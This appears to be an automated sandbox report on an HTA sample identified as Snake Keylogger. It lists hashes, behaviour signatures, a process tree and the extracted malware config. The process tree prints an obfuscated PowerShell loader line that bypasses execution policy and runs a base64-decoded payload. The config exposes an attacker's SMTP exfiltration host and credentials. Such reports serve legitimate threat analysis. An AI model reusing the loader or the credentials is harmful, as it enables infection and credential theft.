Analysis
  Max time kernel: 123s
  Max time network: 128s
  Platform: windows10-2004_x64
  Resource: win10v2004-20240802-en
  Resource tags: arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
  Submitted: 06/10/2024, 18:45
  Static task: static1
  Behavioral task: behavioral1 (sample: na.hta, resource: win7-20240704-en)
  Behavioral task: behavioral2 (sample: na.hta, resource: win10v2004-20240802-en)
General
  Target: na.hta
  Size: 116KB
  MD5: bac652fa9a932e3f71411fb993010377
  SHA1: 0dbe1f2b08510b57f0e00189d2355f57e300c47f
  SHA256: f3761ed191aeddf0e23bba17e361229d81547309dac3b451202df849083b7916
  SHA512: 0ab2913b55e1f60cdb26f003d2c17b492385a43bca2d2c5acb1a659c9a5ed3d232eeceb8b0d4b68ffad11599dab9c27d16d1c990f23e54ea3a8ccd73a4de536f
  SSDEEP: 96:Ea+M73mAWZeuhtAWZDuhogROBHRj/oyYJQAWZSAWZXuhdAWZkAT:Ea+Q3mVkuhtVVuhhRwHxY+VgVFuhdVZT
Malware Config
  Extracted family: snakekeylogger
  Protocol: smtp
  Host: mail.teilecar.com
  Port: 587
  Username: [email protected]
  Password: Manta924porsche=911
  Email To: [email protected]
Signatures
  Snake Keylogger
    Keylogger and Infostealer first seen in November 2020.
  Snake Keylogger payload (1 IoC)
    resource: behavioral2/memory/5056-84-0x0000000000400000-0x0000000000426000-memory.dmp  yara_rule: family_snakekeylogger
  Blocklisted process makes network request (1 IoC)
    flow 15  pid 2312  powershell.exe
  Downloads MZ/PE file
  Evasion via Device Credential Deployment (1 IoC)
    pid 2312  powershell.exe
  Checks computer location settings (2 TTPs, 1 IoC)
    Looks up country code configured in the registry, likely geofence.
    Key value queried: \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation  (mshta.exe)
  Executes dropped EXE (1 IoC)
    pid 1616  taskhostw.exe
  Accesses Microsoft Outlook profiles (1 TTP, 3 IoCs)
    Key opened: \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  (RegSvcs.exe)
    Key opened: \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  (RegSvcs.exe)
    Key opened: \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  (RegSvcs.exe)
  Looks up external IP address via web service (1 IoC)
    Uses a legitimate IP lookup service to find the infected system's external IP.
    flow 17  ioc checkip.dyndns.org
  AutoIT Executable (1 IoC)
    AutoIT scripts compiled to PE executables.
    resource: behavioral2/files/0x000800000002348e-69.dat  yara_rule: autoit_exe
  Suspicious use of SetThreadContext (1 IoC)
    PID 1616 set thread context of 5056  pid 1616  taskhostw.exe  procid_target 91
  Enumerates physical storage devices (1 TTP)
    Attempts to interact with connected storage/optical drive(s).
  System Location Discovery: System Language Discovery (1 TTP, 7 IoCs)
    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
    Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  (taskhostw.exe, RegSvcs.exe, mshta.exe, cmd.exe, powershell.exe, csc.exe, cvtres.exe)
  Suspicious behavior: EnumeratesProcesses (4 IoCs)
    pid 2312  powershell.exe
    pid 2312  powershell.exe
    pid 5056  RegSvcs.exe
    pid 5056  RegSvcs.exe
  Suspicious behavior: MapViewOfSection (1 IoC)
    pid 1616  taskhostw.exe
  Suspicious use of AdjustPrivilegeToken (2 IoCs)
    Token: SeDebugPrivilege  pid 2312  powershell.exe
    Token: SeDebugPrivilege  pid 5056  RegSvcs.exe
  Suspicious use of WriteProcessMemory (19 IoCs)
    PID 3732 wrote to memory of 1896  pid 3732  mshta.exe  procid_target 85  (3 entries)
    PID 1896 wrote to memory of 2312  pid 1896  cmd.exe  procid_target 87  (3 entries)
    PID 2312 wrote to memory of 468  pid 2312  powershell.exe  procid_target 88  (3 entries)
    PID 468 wrote to memory of 3948  pid 468  csc.exe  procid_target 89  (3 entries)
    PID 2312 wrote to memory of 1616  pid 2312  powershell.exe  procid_target 90  (3 entries)
    PID 1616 wrote to memory of 5056  pid 1616  taskhostw.exe  procid_target 91  (4 entries)
  outlook_office_path (1 IoC)
    Key opened: \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  (RegSvcs.exe)
  outlook_win_path (1 IoC)
    Key opened: \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  (RegSvcs.exe)
Processes
  C:\Windows\SysWOW64\mshta.exe  (PID 3732)
    Command line: C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\na.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    - Checks computer location settings
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\cmd.exe  (PID 1896)
      Command line: "C:\Windows\system32\cmd.exe" "/c PoweRsHElL -EX bYpASs -nOp -W 1 -C DEvICECReDENTiaLDEPlOyMENt.eXE ; IEX($(IEx('[sySTEM.TEXt.enCoding]'+[cHaR]0X3a+[cHAR]58+'UTF8.GetsTRiNG([SyStem.ConVERt]'+[CHaR]58+[cHaR]0x3A+'FrOMBaSE64STriNG('+[cHAr]34+'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'+[CHAr]0X22+'))')))"
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (PID 2312)
        Command line: PoweRsHElL -EX bYpASs -nOp -W 1 -C DEvICECReDENTiaLDEPlOyMENt.eXE ; IEX($(IEx('[sySTEM.TEXt.enCoding]'+[cHaR]0X3a+[cHAR]58+'UTF8.GetsTRiNG([SyStem.ConVERt]'+[CHaR]58+[cHaR]0x3A+'FrOMBaSE64STriNG('+[cHAr]34+'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'+[CHAr]0X22+'))')))"
        - Blocklisted process makes network request
        - Evasion via Device Credential Deployment
        - System Location Discovery: System Language Discovery
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  (PID 468)
          Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gkvkbu5g\gkvkbu5g.cmdline"
          - System Location Discovery: System Language Discovery
          - Suspicious use of WriteProcessMemory
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe  (PID 3948)
            Command line: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD4A5.tmp" "c:\Users\Admin\AppData\Local\Temp\gkvkbu5g\CSC7E607820E6A948DD8CD4CB1670F84920.TMP"
            - System Location Discovery: System Language Discovery
        C:\Users\Admin\AppData\Roaming\taskhostw.exe  (PID 1616)
          Command line: "C:\Users\Admin\AppData\Roaming\taskhostw.exe"
          - Executes dropped EXE
          - Suspicious use of SetThreadContext
          - System Location Discovery: System Language Discovery
          - Suspicious behavior: MapViewOfSection
          - Suspicious use of WriteProcessMemory
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  (PID 5056)
            Command line: "C:\Users\Admin\AppData\Roaming\taskhostw.exe"
            - Accesses Microsoft Outlook profiles
            - System Location Discovery: System Language Discovery
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            - outlook_office_path
            - outlook_win_path
Network
MITRE ATT&CK Enterprise v15
Downloads
  File 1
    Filesize: 1KB
    MD5: 3b3e5951462e3dec15d473cd9f308e52
    SHA1: 57512c0cf96f522ea02bff52f6bab381c8ebf323
    SHA256: f32236e911d3ec698fe98419f4d249010bd117ba15f6cf70a29b1a6b9807d6e4
    SHA512: 4278fcb1e436536b78b8d773aca98cf39befce1f2069aa837e362ebd3e176d72fd61270291498b58ab2be251c244b29110d852a149f068a070530a5418a38cb9
  File 2
    Filesize: 60B
    MD5: d17fe0a3f47be24a6453e9ef58c94641
    SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
    SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
    SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
  File 3
    Filesize: 3KB
    MD5: 6b67b5688f49d219931c687ef0d0eca6
    SHA1: 21a777229c64bbcbf3e53208f163bddfbfe258f6
    SHA256: 45f9e67f06d318497d32a943508136efd5e8a7dea08af5275636f8ce9e90d2b4
    SHA512: d267f47b6b5046a94e05f4b1e35527cddf0e62bd012df85496b313f1f285d67083824c9793663cdc28dcd08826e5a49a26660ea7de6b20073a111373c66ea936
  File 4
    Filesize: 934KB
    MD5: d515411b9a3c0d9fb13b9c6a928a7fd0
    SHA1: f940a7302ac76567c15efb1a15d789b42224aac3
    SHA256: 7b2fcffe77e320517c511f5a3700d8545712475aeb4dc04088537fa8456fec77
    SHA512: 447a5ab235672a2d067e5792260aa5b978720f8d67ac80bd875e74d7032cb496e3b0463f3c3870bd87d975cddf7f750df35a9ea7aa8aa65f1bd1590d3305c9d6
  File 5
    Filesize: 652B
    MD5: ae1ab6dc39282f6bf8fbc95a10e16b56
    SHA1: 02c225ec5ca91c1e294de3d8bbc846c69245fa84
    SHA256: 59d5ddf70399dee8efe834e4e132bbd049fa7e29e26164c52c710897d491c2b4
    SHA512: 36df4f26e6f2ab11e7f2cea8501dbf34d595baf9cd95dbee015ddf81a80e2a1b42ed29028c20c48c3b2e1b5621d600c61854174c54aa0919228f33d2dd33c2ef
  File 6
    Filesize: 489B
    MD5: 66cd8bc31e61e003cddb2ea81c47016a
    SHA1: b9172635caecd693d1476d08c9cecb5777ea49bb
    SHA256: 0ce2cb15b914d1becfba7f1eed7a96e44610e5b70a8d4a9568ed117d6c3a73dd
    SHA512: 6dd379fff538ecec3814b2bf5ffb2d3e8d1f5e8da9f79b416cd2ac81b916633122565cb9ce89f3bcbb1acb1da0269ae2977fdd515f74f9ffc8dbcae15a0a15e4
  File 7
    Filesize: 369B
    MD5: a0c2e8b50719bbb88f2e9f734d9d3406
    SHA1: 0760912d408b5e0bc8ce83bf6d447d0c743e1ffa
    SHA256: e019990be6c4a24d34aeb2c2cf630d86ac65d2b23807d3dece8c877172c8e248
    SHA512: 3f06ee7c97b9f89f11f3eb77f87430b5259faa8303086b95b39b073214a2d453a035a99d773bad46f0bbcd82940528205a9036bd417190298ee45b3b8464a1f6